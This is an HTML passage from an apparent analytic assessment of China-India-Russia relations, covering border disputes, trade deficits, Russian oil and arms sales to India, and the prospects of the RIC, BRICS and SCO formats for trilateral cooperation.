href="https://web.archive.org/web/20250822085634/https://www.fmprc.gov.cn/eng/wjbzhd/202508/t20250819_11692398.html">emphasized</a> the importance of continued cooperation between the two countries.</p>
        <p>Despite China and India’s recent diplomatic and economic overtures, tensions remain, particularly around India’s likely suspicions of China’s regional assertiveness and its likely hesitancy to join a persistent anti-Western bloc. Both countries have <a href="https://web.archive.org/web/20250822085634/https://www.fmprc.gov.cn/eng/wjbzhd/202508/t20250819_11692398.html">endorsed</a> the idea of a multipolar world, but Modi has <a href="https://trackingpeoplesdaily.substack.com/p/analysis-of-the-modi-xi-meeting-in?utm_source=publication-search">emphasized</a> the need for a multipolar Asia, likely highlighting continuing tensions that stem from China’s economic influence, military power, and international assertiveness. India likely <a href="https://www.chathamhouse.org/2025/07/back-back-brics-and-quad-meetings-highlight-indias-increasingly-difficult-balancing-act">seeks</a> to <a href="https://moderndiplomacy.eu/2025/09/13/india-and-china-as-beacons-of-multipolarity/">balance</a> asserting itself as a regional power while maintaining good relations with the US. As such, India has not mirrored Russia and China’s strong advocacy for de-dollarization and replacing the international financial system with one based on China’s currency; it has only <a href="https://timesofindia.indiatimes.com/business/india-business/de-dollarisation-not-on-agenda-india-rebuffs-brics-currency-conspiracy-claims-exploring-cross-border-rupee-use/articleshow/122663479.cms">supported</a> inter-BRICS trade based on local currency.</p>
        <h4>Economic Dynamics</h4>
        <p>We assess that China-India economic relations are generally positive, though India took steps to limit Chinese investment during the COVID-19 pandemic and during the 2020 border clashes. In April 2020, India <a href="https://web.archive.org/web/20211231125626/https://dpiit.gov.in/sites/default/files/pn3_2020.pdf">issued</a> Press Note 3, which <a href="https://carnegieendowment.org/research/2025/08/india-china-economic-ties-determinants-and-possibilities?lang=en">limited</a> Chinese investment and existing investments; new Chinese foreign direct investment cumulatively fell by approximately 80% in the 2021–2024 period compared to prior to 2021, and the number of active Chinese companies in India declined by nearly 500. For example, India reportedly <a href="https://archive.ph/uRVbz">rejected</a> a proposed $1 billion investment by China’s electric car maker BYD in 2023 over national security concerns, and a visa ban on Chinese tourists reportedly constrained BYD’s lobbying efforts.</p>
        <p>Despite Indian actions to limit Chinese investment, India’s economy likely remains heavily <a href="https://www.indiatoday.in/business/story/make-in-india-made-in-china-manufacturing-economics-trade-deficit-report-pm-modi-geopolitical-2769387-2025-08-11">dependent</a> on Chinese supply chains, which very likely <a href="https://www.usip.org/publications/2025/06/how-vulnerable-india-chinese-economic-coercion">gives</a> Beijing some economic leverage over India.</p>
        <p>India faces a significant and growing trade deficit with China — <a href="https://eoibeijing.gov.in/eoibejing_pages/MjQ,">reaching</a> $99.21 billion between 2024 and 2025 — and this imbalance has more than doubled in four years. China <a href="https://www.usip.org/publications/2025/06/how-vulnerable-india-chinese-economic-coercion">remains</a> India’s top import source for many goods and commodities critical to its own industrial output, including electronics, telecommunications, electrical products, and machinery.</p>
        <p>India has taken actions to <a href="https://timesofindia.indiatimes.com/business/india-business/how-india-is-planning-to-lower-reliance-on-china-for-its-supply-chains-new-plan-in-works/articleshow/104669779.cms">reduce</a> its dependence on Chinese investment and develop its own competitive advantage. Modi’s administration has <a href="https://www.pib.gov.in/PressReleasePage.aspx?PRID=2107825">bolstered</a> <a href="https://ibef.org/economy/make-in-india">investment</a> in domestic production and <a href="https://www.cato.org/policy-analysis/indias-new-protectionism-threatens-gains-economic-reform#introduction">implemented</a> protectionist policies, such as the “<a href="https://www.pmindia.gov.in/en/major_initiatives/make-in-india/">Make in India</a>” policy, the <a href="https://www.pib.gov.in/PressNoteDetails.aspx?id=155082&amp;NoteId=155082&amp;ModuleId=3">Production-Linked Incentive</a> (PLI) scheme, and, most recently, the “<a href="https://www.impriindia.com/insights/manufacturing-mission-2025/">National Manufacturing Mission</a>.” Threatening China’s economic and technological interests, India <a href="https://economictimes.indiatimes.com/tech/technology/non-chinese-lending-apps-including-payus-lazypay-kissht-blocked-on-meitys-order/articleshow/97656552.cms?from=mdr">banned</a> hundreds of Chinese-developed mobile applications and has <a href="https://www.hindustantimes.com/world-news/trust-replaces-icet-new-brand-old-spirit-on-tech-partnership-101739524899203.html">pursued</a> <a href="https://carnegieendowment.org/posts/2024/09/india-us-relations-beyond-the-modi-biden-dynamic?lang=en">efforts</a> with the US to develop advanced technology supply chains. China has pushed back against some of these efforts. For example, China may have sought to <a href="https://restofworld.org/2025/china-foxconn-factoriesfoxconn-stops-sending-chinese-workers-to-india-iphone-factories/">impede</a> Apple from <a href="https://www.aljazeera.com/economy/2025/4/25/apple-to-move-assembly-of-us-phones-to-india-in-shift-away-from-china">moving</a> its supply chain for US phones from China to India.</p>
        <p>Another area of tension in the China-India economic relationship is very likely China’s increasing investment in South Asia, which conflicts with India’s “Neighbourhood First” policy, in which India <a href="https://www.orfonline.org/research/a-decade-of-neighbourhood-first-perspectives-from-south-asia">views</a> the region as its primary sphere of influence. The policy, <a href="https://www.tandfonline.com/doi/full/10.1080/09700161.2025.2545143?src=">considered</a> a “defining subset of its overall foreign policy,” <a href="https://www.mea.gov.in/lok-sabha.htm?dtl/38762/QUESTION+NO+262+INDIAS+NEIGHBOURHOOD+FIRST+POLICY">hinges</a> on India fostering connectivity, trade, and stability across the region. India likely perceives China’s engagement in South Asia as an effort to exert dominance in a region vital to India’s strategic interests. India almost certainly <a href="https://economictimes.indiatimes.com/news/india/india-reiterates-opposition-to-chinas-belt-and-road-initiative-at-sco-conclave/articleshow/114282891.cms?from=mdr">opposes</a> China’s Belt and Road Initiative (BRI) because New Delhi <a href="https://www.cfr.org/backgrounder/chinas-massive-belt-and-road-initiative">views</a> China’s strategy –– an expansive development and investment project originally devised to construct infrastructure linking East Asia and Europe –– as seeking to dominate the region and <a href="https://www.researchgate.net/publication/380693831_China's_Belt_and_Road_Initiative_A_Threat_to_Indian_Economy_and_Sovereignty">counter</a> India’s regional influence, posing a direct threat to Indian sovereignty. A specific point of contention is the China-Pakistan Economic Corridor (CPEC) — a 3,000-kilometer, over $60 billion project <a href="https://finsindia.org/the-rise-of-china-as-a-threat-to-indias-national-security.html">linking</a> China and Pakistan through roads, railways, and pipelines — which India almost certainly <a href="https://web.archive.org/web/20250616104947/https://www.business-standard.com/external-affairs-defence-security/news/cpec-against-our-territorial-integrity-sovereignty-mea-on-pojk-124053001668_1.html">perceived</a> as the most immediate <a href="https://www.orfonline.org/research/indias-latest-concerns-with-the-cpec?">threat</a> to Indian sovereignty, as it runs through disputed territory in Pakistan-occupied Kashmir. The CPEC aims to <a href="https://www.financialexpress.com/world-news/china-exits-pakistans-60-billion-cpec-flagship-project-islamabad-turns-to-adb-for-funding/3968043/">facilitate</a> Chinese energy imports while <a href="https://merics.org/en/analysis/bri-pakistan-chinas-flagship-economic-corridor">strengthening</a> Pakistan’s economy and strategic connectivity, and Beijing’s backing of Islamabad with resources and infrastructure is likely a major <a href="https://www.ndtv.com/india-news/high-degree-of-collusivity-indian-army-chief-general-upendra-dwivedi-on-pakistan-china-7879130?">concern</a> for India.</p>
        <p>Despite tensions, the value of China’s annual exports to India was greater between 2020 and 2024 than between 2016 and 2020, and was approximately $20 billion <a href="https://www.china-briefing.com/news/china-india-economic-ties-trade-investment-and-opportunities/">more</a> in 2021 than in 2018. The total value of foreign direct investment from China into India also <a href="https://carnegieendowment.org/research/2025/08/india-china-economic-ties-determinants-and-possibilities?lang=en">returned</a> to an upward trajectory after 2021, and particularly in 2024. Multilateral fora such as BRICS and the Asian Infrastructure Investment Bank (AIIB) likely provide additional mechanisms for economic cooperation. China <a href="https://www.reuters.com/article/business/china-launches-new-aiib-development-bank-as-power-balance-shifts-idUSKCN0UU040/">launched</a> the AIIB in 2016, and the bank has dozens of <a href="https://www.aiib.org/en/projects/list/index.html">approved</a> projects in India.</p>
        <h4>Military Dynamics</h4>
        <p>We assess that, since 2020, the China-India military dynamic has centered primarily around a longstanding border dispute and each state’s suspicions of the other’s regional ambitions.</p>
        <p>India and China <a href="https://www.bbc.co.uk/news/world-asia-53062484">share</a> a contested 3,440-kilometer (2,100-mile) border in the Himalayas over which the two countries have had an ongoing, historic <a href="https://www.chathamhouse.org/2025/04/how-china-india-relations-will-shape-asia-and-global-order/evolution-border-dispute">dispute</a>. The two states compete to build infrastructure along the border, known as the Line of Actual Control. The border rivalry <a href="https://www.reuters.com/world/asia-pacific/what-was-india-china-military-clash-2020-about-2024-10-25/">devolved</a> into open confrontation in the Galwan Valley in June 2020, resulting in the deaths of twenty Indian and four Chinese soldiers. Four years of tension <a href="https://carnegieendowment.org/research/2024/12/negotiating-the-india-china-standoff-2020-2024?lang=en">followed</a>, during which each side <a href="https://eastasiaforum.org/2024/11/29/china-india-pact-a-borderline-solution/">built</a> up troops in the contested areas. After at least 21 <a href="https://web.archive.org/web/20240221235015/https://mea.gov.in/press-releases.htm?dtl/37645/21st_round_of_IndiaChina_Corps_Commander_Level_Meeting">rounds</a> of Senior Highest Military Commander Level (Corps Commander) talks and other <a href="https://carnegieendowment.org/research/2024/12/negotiating-the-india-china-standoff-2020-2024?lang=en">efforts</a>, India and China <a href="https://www.mea.gov.in/rajya-sabha.htm?dtl/38689/QUESTION+NO+1199+RECENTLY+SIGNED+BORDER+AGREEMENTS+WITH+CHINA">signed</a> an agreement in 2024, which led to the <a href="https://www.ndtv.com/world-news/explained-india-china-border-patrol-agreement-and-why-it-is-important-6844560">disengagement</a> of troops. Even with border tensions currently defused, the overarching territorial dispute very likely <a href="https://warontherocks.com/2025/09/the-limits-of-rapprochement-between-india-and-china/">persists</a> as a potential strategic flashpoint in the future. As such, military cooperation is unlikely; after the 2025 SCO summit, Modi did not attend the military parade organized in Beijing to commemorate the 80th anniversary of the end of World War II.</p>
        <p>In addition, China’s efforts to assert military power via naval exercises in the Indian Ocean Region (IOR) are likely a particular point of contention between China and India. China’s People’s Liberation Army (PLA) is increasingly active <a href="https://www.iiss.org/online-analysis/charting-china/2025/05/china-in-the-indian-ocean-a-stronger-indo-pacific-presence/">throughout</a> the IOR, often as part of air, land, and sea-based multilateral exercises but also to <a href="https://web.archive.org/web/20250925141545/https://news.cctv.com/2024/04/21/ARTI7yNAn6ts4xOPCejjB2v8240421.shtml">support</a> the PLA Navy’s “Far Seas Protection” <a href="https://digital-commons.usnwc.edu/cgi/viewcontent.cgi?article=1012&amp;context=cmsi-maritime-reports">strategy</a>. In addition to military exercises, the PLA makes <a href="https://c4ads.org/reports/harbored-ambitions/">use</a> of <a href="https://direct.mit.edu/isec/article-abstract/46/4/9/111175/Pier-Competitor-China-s-Power-Position-in-Global?redirectedFrom=fulltext">commercial ports</a> in the IOR, some of which are owned or operated by Chinese state-owned enterprises. New Delhi very likely <a href="https://www.indiatimes.com/news/india/here-is-all-you-should-know-about-string-of-pearls-china-s-policy-to-encircle-india-324315.html">perceives</a> China’s regional cultivation of dual-use commercial ports, naval base in Djibouti, and likely naval facility access in Cambodia — sometimes <a href="https://www.idsa.in/askanexpert/dattatreaya-nimbalkar-asked-why-has-indias-necklace-of-diamonds-strategy-in-the-indian-ocean-region-not-been-as-successful-compared-to-chinas-string-of-pearls-strategy">referred to</a> as a “string of pearls” strategy by analysts outside of China — as an <a href="https://timesofindia.indiatimes.com/blogs/everything-under-the-sun/india-vs-china-the-string-of-pearls-and-belt-road/">encirclement</a> of India in what New Delhi considers its regional maritime domain. This competition has played out at ports across the region. For example, in 2022, China and India <a href="https://direct.mit.edu/isec/article/47/3/174/114671/Correspondence-Debating-China-s-Use-of-Overseas">competed</a> to influence Sri Lanka’s decision regarding China’s request to dock a military vessel at the China-owned and operated Port of Hambantota; the ship ultimately <a href="https://www.reuters.com/world/asia-pacific/chinese-military-ship-leaves-sri-lanka-after-controversial-visit-2022-08-22/">called</a> at the port over New Delhi’s objections. In 2023, India <a href="https://thediplomat.com/2023/11/what-swirls-beneath-research-activity-of-chinese-ships-in-the-indian-ocean/">objected</a> to the presence of a Chinese state-owned research vessel, which China very likely uses to <a href="https://features.csis.org/hiddenreach/china-indian-ocean-research-vessels/">support</a> PLA <a href="https://digital-commons.usnwc.edu/cmsi-maritime-reports/3/">requirements</a>. In support of their territorial claims and very likely to facilitate military contingencies, China and India have worked to <a href="https://chinapower.csis.org/analysis/china-upgrading-dual-use-xiaokang-villages-india-border/">build out</a> relevant <a href="https://southasianvoices.org/sec-f-in-n-sino-indian-renewable-competition-3-18-2025/">infrastructure</a> along disputed border areas.</p>
        <p>Finally, China likely views New Delhi’s joint military exercises with third parties as evidence that India is preparing for a China contingency. In 2022, an annual <a href="https://thediplomat.com/2022/11/india-us-armies-hold-exercises-close-to-disputed-china-border/">exercise</a> with the US took place just 62 miles from a disputed border area. In 2024, India <a href="https://www.thehindu.com/news/national/iafs-largest-multilateral-exercise-tarang-shakti-to-see-participation-of-over-150-aircraft/article68469453.ece">organized</a> the first Tarang Shak air combat exercise that involved ten countries, including the US. In 2025, India and the Philippines <a href="https://www.aljazeera.com/news/2025/8/4/philippines-india-hold-first-joint-naval-drill-in-disputed-south-china-sea">conducted</a> a joint naval drill in the South China Sea. India almost certainly views China’s military <a href="https://www.orfonline.org/research/how-china-and-pakistan-work-against-india">cooperation and integration</a> with Pakistan –– including China’s role as Islamabad’s main supply of arms –– as a grave threat to Indian security. China is <a href="https://www.sipri.org/sites/default/files/2025-03/fs_2503_at_2024_0.pdf">responsible</a> for 81% of Pakistan’s arms imports.</p>
        <h3>India-Russia Relationship: Longstanding and Rooted in Arms Sales and Trade</h3>
        <p>India and Russia have had a close partnership since at least the 1950s, very likely anchored by a mutual desire to push back against perceived US hegemony, Russian arms sales to India, and, more recently, an increase in Indian purchases of Russian oil. In 2010 and <a href="https://www.mea.gov.in/bilateral-documents.htm?dtl%2F37940%2FJoint+Statement+following+the+22nd+IndiaRussia+Annual+Summit">2024</a>, India and Russia <a href="https://www.mea.gov.in/portal/countryquicklink/597_russia_january_2014.pdf">defined</a> their relationship as a “Special and Privileged Partnership.” Following a July 2024 summit, Modi and Putin <a href="https://www.mea.gov.in/bilateral-documents.htm?dtl%2F37940%2FJoint+Statement+following+the+22nd+IndiaRussia+Annual+Summit">issued</a> a statement calling the India-Russia partnership a “time-tested relationship which is based on trust, mutual understanding and strategic convergence.”</p>
        <h4>Political Dynamics</h4>
        <p>India and Russia’s political partnership very likely dates back to at least the 1950s, when the Soviet Union used its UN veto to <a href="https://research.un.org/en/docs/sc/quick">support</a> India’s claims on Kashmir, and is anchored by a shared strategic interest in re-balancing post-Cold War US hegemony in favor of a multipolar world order. New Delhi has <a href="https://research.un.org/en/docs/sc/quick">called</a> Moscow “key to India’s quest for a stable Asian balance of power.” However, India and Russia’s visions for what a multipolar world looks like very likely differ. India’s principle of multi-alignment aims to <a href="https://economictimes.indiatimes.com/news/india/india-is-non-west-but-not-anti-west-jaishankar/articleshow/106531511.cms?from=mdr">reform</a> global power dynamics and is not anti-West, in contrast to Russia’s goal of <a href="https://direct.mit.edu/isec/article/49/3/50/128035/Quo-Vadis-Russian-Deterrence-Strategic-Culture-and">ushering</a> in a world in which Russia, China, and the US are on equal footing. Indian Foreign Minister Subrahmanyam Jaishankar has <a href="https://economictimes.indiatimes.com/news/india/india-is-non-west-but-not-anti-west-jaishankar/articleshow/106531511.cms?from=mdr">articulated</a> that India’s “non-West” character does not mean it is “anti-West.” Jaishankar’s book on India’s foreign policy, <em>Why Bharat Matters</em>, <a href="https://www.academia.edu/116195958/Why_Bharat_Matters_2024_">asserts</a> that India’s approach that distanced itself from the West “has led [India] to develop dependencies elsewhere” — yet specifically asserts that India “must realize that there is little profit in being anti-West.”</p>
        <p>India’s diplomatic approach to Russia suggests it is willing to occasionally compromise on its <a href="https://theloop.ecpr.eu/indias-sovereignty-paradox-neutrality-oil-and-the-price-of-multi-alignment/">declared</a> neutral, non-aligned strategy. India <a href="https://web.archive.org/web/20230227221317/https://economictimes.indiatimes.com/news/india/are-we-anywhere-near-a-possible-solution-acceptable-to-both-sides-india-abstains-in-unga-on-ukraine-resolution/articleshow/98194298.cms">abstained</a> on multiple UN resolutions relating to Russia’s invasion and Ukraine’s sovereignty, has not taken a condemnatory stance against Russia’s invasion of Ukraine, and consistently <a href="https://www.mea.gov.in/bilateral-documents.htm?dtl/38214/IndiaUkraine_Joint_Statement_on_the_Visit_of_Prime_Minister_of_India_to_Ukraine#:~:text=The%20Indian%20side%20reiterated%20its,%2C%20Switzerland%2C%20in%20June%202024.">calls</a> for a “peaceful resolution through dialogue and diplomacy.” Modi and Putin have publicly <a href="https://timesofindia.indiatimes.com/india/putin-dials-modi-pm-thanks-friend-for-bday-wishes-india-ready-to-help-in-ukraine-peace-efforts/articleshow/123946697.cms">maintained</a> a warm friendship despite US and European criticism of Russia, and Modi has <a href="https://www.theguardian.com/world/article/2024/jul/09/modi-putin-summit-bonds-of-friendship-ukraine-tensions">referred</a> to Russia as India’s “all-weather friend and trusted ally.”</p>
        <h4>Economic Dynamics</h4>
        <p>Russia very likely views India as a critical, longstanding market for Russian weapons and, increasingly since Russia’s full-scale invasion of Ukraine in 2022, an economic partner that helps Russia recoup revenue lost due to Western sanctions. India’s import of crude oil from Russia increased from $2.3 billion in 2021 to $52.7 billion in 2024, despite Western sanctions on Russia. India’s Ministry of External Affairs has <a href="https://www.mea.gov.in/response-to-queries.htm?dtl%2F39812%2FOfficial_Spokespersons_response_to_media_queries_regarding_recent_EU_sanctions_July_18_2025">stated</a> that India “does not subscribe to any unilateral sanctions measures,” and “considers the provision of energy security a responsibility of paramount importance to meet the basic needs of its citizens.” Since 2023, Russia <a href="https://www.reuters.com/markets/commodities/russia-squeezes-mideast-opec-shares-indias-oil-market-historic-lows-2024-04-19">has been</a> India’s top supplier of crude oil, and Russian oil <a href="https://oilprice.com/Energy/Energy-General/Disregarding-US-Sanctions-India-Continues-to-Buy-Russian-Crude.html">exceeded</a> 40% of India’s overall crude imports by May 2025. As a result, India is now the second-largest purchaser of Russian crude oil after China. Discounted Russian oil has fueled India’s surging energy needs and <a href="https://oec.world/en/profile/bilateral-product/refined-petroleum/reporter/ind">enabled</a> it to become the third-largest exporter of refined petroleum products, which is India’s most exported product. Even after US President Donald Trump placed a 50% tariff to dissuade India from continuing to buy Russian oil, Indian oil imports <a href="https://indianexpress.com/article/business/indias-russian-oil-imports-robust-in-sept-so-far-crude-loadings-from-ports-stable-10254256/">remained</a> steady in the first half of September 2025. The US subsequently <a href="https://home.treasury.gov/news/press-releases/sb0290">imposed</a> sanctions on Russian oil exporters Lukoil and Rosneft on October 22, 2025, prompting Indian refiners to <a href="https://www.reuters.com/business/energy/indian-refiners-await-clarity-new-russian-oil-orders-2025-10-28/">pause</a> new orders and seek alternatives for sanctioned Russian oil. On October 28, an India-bound tanker carrying Russian crude <a href="https://timesofindia.indiatimes.com/business/india-business/sign-of-oil-trade-disruption-after-trump-sanctions-russian-crude-oil-tanker-headed-for-india-takes-a-u-turn-now-idling-in-baltic-sea/articleshow/124897820.cms">turned around</a> in the Baltic Sea — an incident that oil analysts <a href="https://oilprice.com/Latest-Energy-News/World-News/Russian-Oil-Tanker-Turns-Back-Under-US-Sanctions-Threat.html">attributed</a> to the US sanctions pressure. However, Indian Oil <a href="https://www.reuters.com/business/energy/indian-oil-buys-russian-crude-non-sanctioned-entities-sources-say-2025-10-31/">continued</a> to purchase Russian crude from non-sanctioned entities, suggesting the US sanctions are likely to impact, but not halt, India’s imports from Russia.</p>
        <p>Total trade between India and Russia <a href="https://ibef.org/indian-exports/india-russia-trade">amounted</a> to $68.7 billion in FY2025, likely <a href="https://www.orfonline.org/expert-speak/a-deep-dive-into-the-india-russia-economic-relations">surging</a> as a result of the vacuum left by Western firms. However, India’s imports from Russia account for $63.8 billion, over 90% of the total trade, reflecting a significant trade imbalance. Even so, New Delhi <a href="https://timesofindia.indiatimes.com/india/trade-deficit-rising-due-to-oil-buy-need-to-address-it-eam-in-russia/articleshow/123418117.cms">aims</a> to achieve $100 billion in trade with Russia by 2030. Both countries seek to <a href="https://timesofindia.indiatimes.com/business/india-business/rupee-rouble-rule-what-rbi-move-means-for-russia-trade/articleshow/123269562.cms">reduce</a> reliance on the US dollar, and 90% of trade is now <a href="https://m.economictimes.com/news/economy/foreign-trade/rupee-rouble-rule-rbi-clears-path-for-faster-india-russia-payments/articleshow/123277090.cms">settled</a> in ruble-rupee transactions. However, India’s trade with the West will likely <a href="https://indianexpress.com/article/business/banking-and-finance/as-russia-seeks-to-expand-trade-in-rupee-rouble-rbi-sebi-remain-wary-9608947/">complicate</a> financial integration; India has been <a href="https://www.theweek.in/news/india/2024/12/03/india-finance-ministry-parliament-response-new-brics-currency-payment-system.html">hesitant</a> to adopt sanctions-resistant payment networks with Russia and has <a href="https://economictimes.indiatimes.com/news/india/india-seeks-rupees-global-reach-but-no-plan-to-replace-us-dollar-eam-s-jaishankar/articleshow/118747922.cms?from=mdr">dismissed</a> the idea of replacing the US dollar.</p>
        <h4>Military Dynamics</h4>
        <p>We assess that India and Russia’s military relationship is <a href="https://warontherocks.com/2025/09/guns-oil-and-dependence-can-the-russo-indian-partnership-be-torpedoed/">centered</a> on Russia’s long history of exporting weapons to India, which has created an Indian dependence on Russian systems. Over the past twenty years, India has <a href="https://warontherocks.com/2025/04/friends-with-limits-the-future-of-russo-indian-defense-ties/">purchased</a> roughly $60 billion in Russian weapons, amounting to 65% of its total weapons imports. India’s purchases <a href="https://www.thedefensenews.com/news-details/Russia-Offers-S-400-Tech-Transfer-to-India--Local-Manufacturing-of-S-400-Components/">include</a> Russia’s S-400 missile defense system, which India <a href="https://www.ndtv.com/india-news/pak-missile-attack-india-15-cities-targeted-india-uses-harpy-drones-s-400-missile-defence-system-to-counter-pak-attack-8362473">used</a> in May 2025 to repel Pakistani missile attacks. India and Russia have also <a href="https://www.cna.org/reports/2025/08/Russia-India-Relations-Multipolarity-in-Practice.pdf">pursued</a> joint production of weapons, including T-90 tanks and Su-30MKI aircraft. India-Russia military cooperation has <a href="https://www.cna.org/reports/2025/08/Russia-India-Relations-Multipolarity-in-Practice.pdf">stagnated</a> on other fronts, such as joint training and exercises.</p>
        <p>Although Moscow <a href="https://www.newindianexpress.com/nation/2025/Mar/11/russia-remains-top-arms-supplier-to-india-sipri-report">continues to be</a> India’s main arms supplier, India’s arms purchases from Russia have declined since 2024, as India has <a href="https://idrw.org/pressure-mounts-on-russia-to-offer-niche-military-supplies-to-india-amid-push-for-reduced-dependency/">sought</a> to <a href="https://www.business-standard.com/external-affairs-defence-security/news/india-looks-west-for-cutting-edge-weapons-to-reduce-reliance-on-russia-124120300498_1.html">reduce</a> its reliance on Russia and increasingly purchase from Western suppliers, including France, Israel, and the US. On October 31, 2025, India and the US <a href="https://timesofindia.indiatimes.com/india/new-chapter-rajnath-singh-meets-us-secretary-of-war-pete-hegseth-signs-10-yr-defence-framework/articleshow/124985959.cms">signed</a> a ten-year Defense Framework Agreement, which Indian Defense Minister Rajnath Singh described as the start of a “new chapter” in India-US defense cooperation and “a signal of our growing strategic convergence.” This agreement likely reflects India’s intent to continue diversifying its military cooperation and arms trade beyond Russia, and shore up its US partnership amid tariff-related strife — further reinforcing the multi-alignment doctrine driving India’s security calculations and reducing the likelihood of a Russia-India-China military alliance.</p>
        <p>The <a href="https://www.rand.org/pubs/commentary/2024/08/something-is-rotten-in-the-state-of-russian-arms-industry.html">documented</a> poor performance of Russian weapons systems in Ukraine likely impacts India’s calculus. A leak by hacker collective “Black Mirror” <a href="https://defencesecurityasia.com/en/india-mig29k-radar-leak-russia-zhukme-blackmirror/">revealed</a> internal documents from Russia’s state-owned defense conglomerate Rostec <a href="https://militarnyi.com/en/news/russian-zhuk-me-radar-undermined-combat-capability-of-indian-mig-29s/">detailing</a> how the Russian-manufactured radar system installed in India’s MiG-29K fighter aircraft suffered extensive and systemic failures between 2016 and 2019; this lack of reliability likely encouraged India’s move away from Russian weapons.</p>
        <h2>State of the Nascent Trilateral Dynamic and Indicators of Deepening Trilateral Cooperation</h2>
        <p>China, India, and Russia have not declared a formal bloc; instead, in recent months, the three states have taken primarily diplomatic steps to project increased interest in trilateral engagement –– most notably a meeting between Modi, Putin, and Xi at the 2025 SCO Summit. Though the three states did not make any concrete commitments at the summit, the meeting represents the first time all three leaders have met in person since 2019, and very likely reflects an effort by Russia and China to exploit strains in the US-India relationship to draw India away from the US.</p>
        <p>Past trilateral engagement, which has primarily occurred at multilateral fora such as BRICS, SCO, and G20 Summits, has not resulted in a solidified, institutionalized trilateral bloc due to divergent national interests that will likely pose a long-term structural impediment. These strategic differences will likely persist and continue to limit the depth and breadth of alignment among the three countries, making it less likely that a solidified trilateral bloc will emerge in the short term. The three primary multilateral fora where trilateral engagement –– short of formation of a bloc –– has occurred are the now-dormant RIC format, BRICS, and the SCO.</p>
        <h4>RIC Format: Dormant, Though Russia and China Are Interested in Reviving It</h4>
        <p>The RIC format is likely the multilateral forum in which trilateral engagement would primarily take place, given the apparent interest of Beijing and Moscow in reviving the dormant discussion format and New Delhi’s apparent reserved openness to the possibility. The RIC format, which began formally in 2007 and involves trilateral discussions among the foreign ministers of these countries, has been inactive since late 2021.</p>
        <p>Between 2002 and 2020, twenty trilateral ministerial-level <a href="https://www.firstpost.com/explainers/russia-india-china-ric-troika-revival-explained-13908388.html">meetings</a> occurred, covering topics such as trade, energy, and disaster management. At the most recent RIC foreign ministers <a href="https://web.archive.org/web/20211127014320/https://www.mea.gov.in/bilateral-documents.htm?dtl/34540/joint+communique+of+the+18th+meeting+of+the+foreign+ministers+of+the+russian+federation+the+republic+of+india+and+the+peoples+republic+of+china">meeting</a> in November 2021, the three countries expressed interest in regular high-level meetings, reiterated the importance of international reform for a multipolar and rebalanced world, and opposed unilateral sanctions imposed outside of the UNSC.</p>
        <p>In a 2022 joint statement, China and Russia <a href="https://www.airuniversity.af.edu/Portals/10/CASI/documents/Translations/2022-02-04%20China%20Russia%20joint%20statement%20International%20Relations%20Entering%20a%20New%20Era.pdf">declared</a> their intent to develop cooperation within the RIC format, a sentiment Russian Foreign Minister Sergey Lavrov <a href="https://thediplomat.com/2025/07/is-the-russia-india-china-troika-making-a-comeback/">reiterated</a> in May 2025. In July 2025, an Indian government spokesperson neither rejected nor explicitly supported the revival of the RIC format, likely <a href="https://web.archive.org/web/20250925171754/https://www.mea.gov.in/media-briefings.htm?dtl/39809/Transcript_of_Weekly_Media_Briefing_by_the_Official_Spokesperson_July_17_2025">indicating</a> India’s reserved openness to it.</p>
        <h4>BRICS: Ill-Equipped to Institutionalize Trilateral Engagement, Though Opportunities Remain for Economic Engagement</h4>
        <p>The BRICS (Brazil, Russia, India, China, and South Africa) bloc is active, though very likely ill-equipped to facilitate the institutionalization of a trilateral Russia-India-China bloc due to its status as an informal coordinating body, as opposed to an organization that requires mutual commitments. BRICS was formed in 2009 and is an organization <a href="http://www.brics.utoronto.ca/docs/090616-leaders.html">committed</a> to perpetuating a multipolar world via political, security, and economic cooperation.</p>
        <p>Though Russia and China have <a href="https://www.usip.org/publications/2024/10/whats-driving-bigger-brics-and-what-does-it-mean-us">sought</a> to make BRICS a geostrategic bloc to rival the West, the organization does not bind its member states to any treaty, alliance, or formal legal structure, thereby limiting the organization’s ability to institutionalize a geostrategic bloc. India <a href="https://www.isas.nus.edu.sg/papers/indias-role-in-the-brics-navigating-the-balance-in-a-changing-world/#_ftnref8">views</a> the forum as a key balancing factor in its nuanced multi-alignment strategy, in which New Delhi seeks to position itself as a bridge between Western and non-Western fora.</p>
        <p>Despite the overall limitations of the BRICS structure, the connectivity it provides for financial institutions likely raises the possibility of BRICS facilitating trilateral economic integration, should China, India, and Russia choose to pursue that sort of cooperation. BRICS has established two financial institutions, both of which are <a href="https://researchbriefings.files.parliament.uk/documents/CBP-10136/CBP-10136.pdf">based</a> on foundational treaties. The New Development Bank (NDB) <a href="https://www.ndb.int/wp-content/uploads/2022/07/NDB_StrategyDocument_Eversion-1.pdf">supports</a> collaborative development projects in emerging markets and developing countries, and the Contingent Reserve Arrangement ensures BRICS’s central banks provide mutual support during a currency crisis. BRICS’s interconnected financial systems could facilitate trilateral economic activity and offer a way for the three countries to conduct trade payments.</p>
        <p>We assess that BRICS could also facilitate Russia and China’s <a href="https://carnegieendowment.org/research/2023/12/the-difficult-realities-of-the-brics-dedollarization-effortsand-the-renminbis-role?lang=en">efforts</a> to develop alternatives to the US dollar, though India’s <a href="https://www.indiatoday.in/india-today-insight/story/as-brics-debates-reducing-dollar-dependence-why-india-is-walking-a-fine-line-2753797-2025-07-10">hesitation</a> to aggressively push for de-dollarization likely limits the extent to which de-dollarization will become an area for trilateral engagement. BRICS nations have <a href="https://responsiblestatecraft.org/dedollarization-china-russia/">explored</a> the development of a common currency and have specifically <a href="https://www.thenationalnews.com/business/2025/07/13/brics-brazil-china-us/">created</a> a cross-border digital payment and messaging system backed by cryptocurrency, <a href="https://www.brics-pay.com/">called</a> BRICS Pay. During the July 2025 BRICS summit in Rio de Janeiro, Brazil, member countries reportedly made progress in “<a href="https://dirco.gov.za/wp-content/uploads/2025/07/2025.07.05.-BRICS-Leaders-Declaration.pdf">identifying</a> possible pathways to support the continuation of discussions on the potential for greater interoperability of BRICS payment systems.”</p>
        <h4>Shanghai Cooperation Organization (SCO): Encumbered by Competing Interests</h4>
